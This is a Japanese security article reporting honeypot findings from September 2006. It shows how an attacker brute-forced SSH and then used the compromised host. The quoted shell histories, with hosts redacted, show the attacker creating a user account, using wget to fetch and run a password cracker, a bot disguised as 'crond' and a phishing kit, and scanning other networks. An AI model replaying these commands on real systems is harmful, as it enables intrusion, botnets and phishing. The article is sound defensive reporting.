パスワードを破ってFTPサーバーやSSHサーバーに不正侵入しようとする攻撃が後を絶たない。IBM ISSのセキュリティオペレーションセンター(SOC)でも多数検知している。本稿ではパスワード解析の脅威を再認識していただくために,ハニーポット[注1]を使った調査結果を基に,その実際の手口を解説したい。

注1 ハニーポットとは,攻撃者やワームなどをおびき寄せ,侵入後にどんな行動をとるかを監視・観察するためのシステムのこと(用語解説)。今回使用したハニーポット環境では,侵入した攻撃者が悪用できないようにアクセス制限を施し,外部への不正なパケットを制御した。

侵入後の振る舞い

 ハニーポットによる調査期間は2006年9月1日から9月25日。以下では,実際にパスワードを破られて侵入された事例を紹介する。

 システム・ログを確認したところ,この事例では,SSHサービスに対する認証が特定のIPアドレスから370回ほど連続しておこなわれ,最終的に侵入を許した。侵入後の攻撃者の行動は,historyコマンド[注2]によって確認できた(リスト1)。

注2 UNIX系OSのコマンドの一つ。コマンドの実行履歴などを表示する。

04  screen
05  w
06  cat /proc/cpuinfo 
07  /usr/sbin/useradd test
08  passwd test
09  cd /var/tmp
10  wget www.XXXX.XXXX.ro/XXXXcod.tar.gz ; tar zxvf XXXXcod.tar.gz ; cd XXXXcod ; chmod +x *
(パスワード解析ツールをダウンロードしている様子)
11  /unix 205.XXXX;./unix 208.XXXX;./unix 128.XXXX;./unix 137.XXXX 
(複数のネットワークに対してパスワード解析を実行している様子)

リスト1 historyの出力結果の一部(その1)(リスト中の「XXX」はいずれも伏字)

 出力結果を見ると,攻撃者は侵入に成功したシステム(ハニーポット)を,別のシステムに対するパスワード解析攻撃の踏み台にしていることが分かる。攻撃者はwgetコマンドを使って,無料のホスティング・サービスからパスワード解析ツールをダウンロードし(リスト1 10行目),複数のクラスBのアドレス・レンジに対してパスワード解析を仕掛けている(同11行目)。

 後日調査したところ,このとき使用されたツールは「辞書攻撃」をおこなうものであることが確認できた。辞書攻撃とは,パスワードとして使われることが多い単語を収めた“辞書”を使ってパスワードを破る攻撃手法のこと。このツールが使っていた辞書には1万3562件の単語が登録されていた。

 侵入されたシステムは,別のシステムへの侵入に悪用されるだけではない。侵入に成功した別の攻撃者は,ハニーポットにボットを仕掛けようとした(リスト2 132行目,138行目)。

132  wget XXXX.XXXX.uk/XXXX.tgz(ボット関連の圧縮ファイル)
133  tar xzvf XXXX.tgz
134  cd ..
135  ls
136  cd linuxbot/
137  ls
138  ./crond

リスト2 historyの出力結果の一部(その2)(リスト中の「XXX」はいずれも伏字)

 さらにその後,このシステム上に,フィッシング詐欺を目的とした偽のWebサイトを構築しようとしている(リスト3 144行目)

140  w
141  uname -a
142  cd /var/www/html
143  ls
144  wget XXXX.XXXX.com/XXXX.tgz(フィッシング・サイトの構築ツール)
145  tar xvfz XXXX.tgz
146  cd ..
147  ls
148  cd html
149  ls
150  chmod +x XXXX
151  cd XXXX
152  chmod +x *
153  ls

リスト3 historyの出力結果の一部(その3)(リスト中の「XXX」はいずれも伏字)

 この事例に見られるように,一度侵入されると,そのシステムは攻撃者に“思う存分”悪用されることになる。不正侵入を許すことは,攻撃者に加担することになるのだ。システムに重要な情報が保存されていないからといって,油断してはいけないことが分かっていただけるだろう。

 余談ではあるが,今回の調査では,攻撃者は14のサイトから解析ツールなどをダウンロードしていた。これらのサイトを調べたところ,8サイトが無料で利用できるホスティング・サービスのサイトだった。無料のホスティング・サービスは,住所や氏名,年齢などを入力すれば誰でも利用できる。しかも,偽りのデータを入力しても確認されないので,事実上匿名で利用可能だ。そのため,ツールの置き場所として攻撃者に悪用されることが多い。

 この記事は,2006年11月13日に公開した「今週のSecurity Check」を再構成したものです。